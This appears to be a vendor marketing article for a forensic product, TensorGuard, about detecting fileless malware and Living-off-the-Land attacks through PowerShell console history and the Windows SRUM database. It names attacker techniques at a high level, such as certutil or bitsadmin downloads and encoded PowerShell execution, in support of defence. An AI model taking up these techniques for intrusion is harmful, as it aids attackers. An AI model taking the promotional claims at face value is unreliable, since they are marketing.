Table of Contents
The era of adversaries dropping noisy, easily signatured malware executables onto a victim’s hard drive is largely over. Modern threat actors—ranging from state-sponsored Advanced Persistent Threats (APTs) to sophisticated ransomware syndicates—have evolved to evade traditional Endpoint Detection and Response (EDR) platforms by utilizing “Living off the Land” (LotL) techniques and fileless malware architectures.
Because EDR solutions rely heavily on evaluating the behavior and cryptographic signatures of compiled binaries written to the disk, they are inherently disadvantaged when an attacker utilizes legitimate, pre-installed administrative tools to execute their objectives. To definitively detect and eradicate these invisible adversaries, Senior Threat Hunters and Incident Responders must look beyond live memory monitoring and deeply interrogate the operating system’s internal accounting mechanisms.
TensorGuard automates this rigorous process, effortlessly parsing artifacts like PowerShell forensics and the System Resource Usage Monitor (SRUM) at fleet scale to expose what traditional security controls miss.
The Invisible Attacker: Bypassing Live Telemetry
Fileless malware detection is notoriously difficult because the malicious payload resides almost entirely within volatile memory (RAM). Attackers leverage tools like Windows Management Instrumentation (WMI), Registry keys, or scheduled tasks to maintain persistence and execute code without ever creating a traditional file on the NTFS volume.
Similarly, in a Living off the Land attack, adversaries hijack native Windows binaries—such as powershell.exe, certutil.exe, or bitsadmin.exe—to download payloads, move laterally, or exfiltrate data. Because these binaries are cryptographically signed by Microsoft and are required for legitimate IT administration, EDR platforms cannot simply block their execution. The security platform is forced to evaluate the context of the execution, a task that attackers actively subvert through heavy script obfuscation and memory injection techniques.
If an attacker successfully suppresses the live EDR alert or executes their script before an EDR agent is deployed, the activity becomes invisible to real-time monitoring. However, the Windows operating system always leaves a forensic trail.
Decoding ConsoleHost_history.txt: The PowerShell Confession
PowerShell is the weapon of choice for modern adversaries due to its deep integration with the .NET framework and Windows API. While attackers may obfuscate their scripts to bypass live Anti-Malware Scan Interface (AMSI) hooks, the underlying execution history is often preserved on the disk.
By default, the PSReadline module in modern versions of PowerShell saves a complete, chronological record of every command a user types into a console session. This artifact, stored as ConsoleHost_history.txt within the user’s AppData directory, is a goldmine for threat hunters.
The Value of PowerShell Forensics
- Exposing the Attack Chain: Unlike fragmented Event Logs, the
ConsoleHost_history.txtprovides a literal, sequential script of the attacker’s activities. You can read exactly what the adversary typed. - Uncovering Lateral Movement: Investigators can identify specific cmdlets used for reconnaissance (e.g.,
Get-ADUser) and lateral movement (e.g.,Enter-PSSessionorInvoke-Command), mapping the exact trajectory of the breach across the domain. - De-obfuscating Intent: Even if an attacker executes an encoded payload (e.g.,
powershell -enc <Base64>), the execution string itself is captured, allowing forensic analysts to decode the payload post-mortem and determine the adversary’s ultimate objective.
TensorGuard automatically extracts and analyzes the PS History artifact across thousands of endpoints simultaneously. Instead of manually querying individual hosts, threat hunters can ask TensorGuard’s Evie Intelligence Engine to identify any instances of obfuscated PowerShell execution across the entire fleet in seconds.
Tracking Network Usage with SRUM: Bypassing PCAP
If fileless malware successfully hides in memory and evades file-system detection, it still has a fundamental weakness: it must communicate. Whether it is beaconing to a Command and Control (C2) server or exfiltrating compressed archives, the malware must generate outbound network traffic.
Traditionally, detecting anomalous network traffic required continuous, full Packet Capture (PCAP). However, retaining PCAP data for an entire enterprise is prohibitively expensive, and the data is usually overwritten within days. Furthermore, if an attacker injects their malicious thread into a benign process like svchost.exe or explorer.exe, traditional network monitors will simply attribute the traffic to the Windows operating system, masking the intrusion.
This is where SRUM forensic analysis becomes the ultimate trump card.
The System Resource Usage Monitor (SRUM) is an embedded Windows feature designed to track system resource consumption on a per-application basis. Hidden within an Extensible Storage Engine (ESE) database (SRUDB.dat), SRUM quietly logs exactly which user account and which specific application generated network traffic, CPU cycles, and disk I/O.
Crucially, SRUM retains this highly granular data for a rolling 60-day period.
Attributing the Unattributable
By automating the parsing of the SRUM database, TensorGuard allows threat hunters to retroactively analyze 60 days of network activity without needing a single byte of PCAP data. If a supposedly benign instance of notepad.exe or an obscure system service mysteriously generated gigabytes of outbound Wi-Fi traffic three weeks ago, TensorGuard’s AI engine instantly flags the anomaly, directly attributing the C2 communication to the hijacked process.
Automating the Hunt
Manually extracting and deciphering SRUDB.dat databases and scattered PowerShell histories across an enterprise is mathematically impossible during a fast-moving incident response engagement.
TensorGuard operationalizes these deep forensic artifacts. By continuously sweeping endpoints and synthesizing SRUM network attribution with PowerShell execution logs, TensorGuard strips away the invisibility cloak of fileless malware and LotL attacks. Threat hunters are provided with an evidence-backed, fully correlated timeline of adversary activity, fundamentally shifting the balance of power back to the defense.
